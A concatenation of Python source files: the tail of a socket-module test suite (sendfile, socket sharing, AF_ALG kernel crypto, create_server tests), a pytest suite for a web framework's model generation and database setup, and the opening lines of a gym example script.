self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
@unittest.skip("TODO: RUSTPYTHON, socket sharing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
@unittest.skip("TODO: RUSTPYTHON, fix sendfile")
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
pow_tests.py
|
#
# Pow Default Tests
#
#
# runtest script.
# runs test with respect to some paramters
# currently only os
import sys
import pytest
# possible sys.platform results:
# http://stackoverflow.com/questions/446209/possible-values-from-sys-platform
MODELNAME = "pow_test_model"
class TestClass:
@pytest.mark.notonosx
@pytest.mark.run(order=1)
@pytest.mark.minimal
def test_server(self):
""" test if server starts
calls baseurl:port/test/12
must return 12.
This test the server, routing and method dispatching
"""
print(" .. Test if server works" )
from multiprocessing import Process
import employees.server
import requests
import employees.conf.config as cfg
import time
p = Process(target=employees.server.main)
p.start()
testurl=cfg.server_settings["protocol"] + cfg.server_settings["host"] + ":" + str(cfg.server_settings["port"]) + "/test/12"
r = requests.get(testurl)
p.terminate()
assert int(r.text)==12
@pytest.mark.run(order=2)
@pytest.mark.minimal
def test_sql_generate_model(self):
""" test if sql model is generated"""
print(" .. Test generate_model")
import employees.generate_model as gm
import uuid
import os.path
ret = gm.generate_model(MODELNAME, "sql", appname="employees")
# generate model returns true in case of success
assert ret is True
assert os.path.exists(os.path.normpath("../models/sql/" + MODELNAME + ".py"))
@pytest.mark.run(order=3)
@pytest.mark.minimal
def test_sql_model_type(self):
""" based on test_generate_model. Tests if a model can insert values
DB sqlite by default.
"""
print(" .. Test model is correct type")
from employees.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
assert isinstance(m, PowTestModel)
@pytest.mark.run(order=4)
def test_sql_dbsetup(self):
""" test the setup of the alembic environment """
print(" .. Test SQL: db_setup")
import employees.init_sqldb_environment
import os
os.chdir("..")
r = employees.init_sqldb_environment.init_migrations()
assert r == True
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=5)
def test_sql_migration(self):
""" test the setup of the alembic environment
generate a migration
"""
print(" .. Test SQL: generate_migration")
import employees.generate_migration
import os
os.chdir("..")
script = employees.generate_migration.generate_migration(message="pow_test")
assert os.path.exists(os.path.normpath(script.path))
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=6)
def test_sql_dbupdate(self):
""" test the setup of the alembic environment
actually migrate the DB schema up
"""
print(" .. Test SQL: update_db -d up")
import employees.update_db
import os, time
ret = None
os.chdir("..")
time.sleep(1)
try:
ret = employees.update_db.migrate("up")
except Exception as e:
print(e)
ret = True
time.sleep(5)
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=7)
def test_if_sql_model_validation_works(self):
"""
check if validation works
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
assert m.validate() == True
@pytest.mark.run(order=8)
def test_if_sql_model_validation_fails_successfully(self):
"""
check if validation fails if type is wrong
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
m.title="123456789123456789123456789123456789"
assert m.validate() == False
@pytest.mark.run(order=9)
def test_sql_insert_and_find(self):
""" based on test_generate_model.
Tests if a model can insert values in the DB
and can be found by title attribute.
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.sql.pow_test_model import PowTestModel
import os
m = PowTestModel()
m.title = "TestnamePowTestRunner"
m.upsert()
res=m.find(PowTestModel.title=="TestnamePowTestRunner")
assert res.count()==1
m.session.close()
os.chdir(os.path.abspath(os.path.dirname(__file__)))
#
# tinyDB tests
#
@pytest.mark.run(order=10)
@pytest.mark.minimal
def test_tinydb_generate_model(self):
""" test if sql model is generated"""
print(" .. Test tinyDB generate_model")
import employees.generate_model as gm
import uuid
import os.path
ret = gm.generate_model(MODELNAME, "tinydb", appname="employees")
# generate model returns true in case of success
assert ret is True
assert os.path.exists(os.path.normpath("../models/tinydb/" + MODELNAME + ".py"))
@pytest.mark.run(order=11)
@pytest.mark.minimal
def test_if_tinydb_model_validation_works(self):
"""
check if validation works
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
assert m.validate() == True
@pytest.mark.run(order=12)
@pytest.mark.minimal
def test_if_tinydb_model_validation_fails_successfully(self):
"""
check if validation fails if type is wrong
"""
print(" .. Test SQL: model.upsert() and model.find()")
from employees.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
m.title="123456789123456789123456789123456789"
assert m.validate() == False
@pytest.mark.run(order=13)
@pytest.mark.minimal
def test_tinydb_model_type(self):
""" based on test_generate_model. Tests if a model can insert values
DB sqlite by default.
"""
print(" .. Test model tinyDB is correct type")
from employees.models.tinydb.pow_test_model import PowTestModel
m = PowTestModel()
assert isinstance(m, PowTestModel)
@pytest.mark.run(order=14)
def test_tinydb_insert_and_find(self):
""" based on test_generate_model. Tests if a model can insert values
and can be found back.
"""
print(" .. Test tinyDB: model.upsert() and model.find()")
from employees.models.tinydb.pow_test_model import PowTestModel
import os
m = PowTestModel()
m.title = "TestnamePowTestRunner"
m.upsert()
res=m.find(m.Query.title=="TestnamePowTestRunner")
assert res
m.db.close()
os.chdir(os.path.abspath(os.path.dirname(__file__)))
if __name__ == "__main__":
print(55*"-")
print(" running pow Tests on: " + sys.platform)
print(" ... ")
if sys.platform.startswith("darwin"):
# osx
ret = pytest.main(["-k-notonosx", "pow_tests.py"])
else:
ret = pytest.main(["pow_tests.py"])
print(" Failures: " +str(ret))
print(55*"-")
|
multi_gym_example.py
|
#!/usr/bin/env python3
import gym
